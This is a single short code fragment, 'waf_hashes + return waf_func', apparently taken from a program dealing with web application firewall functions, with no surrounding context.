waf_hashes + return waf_func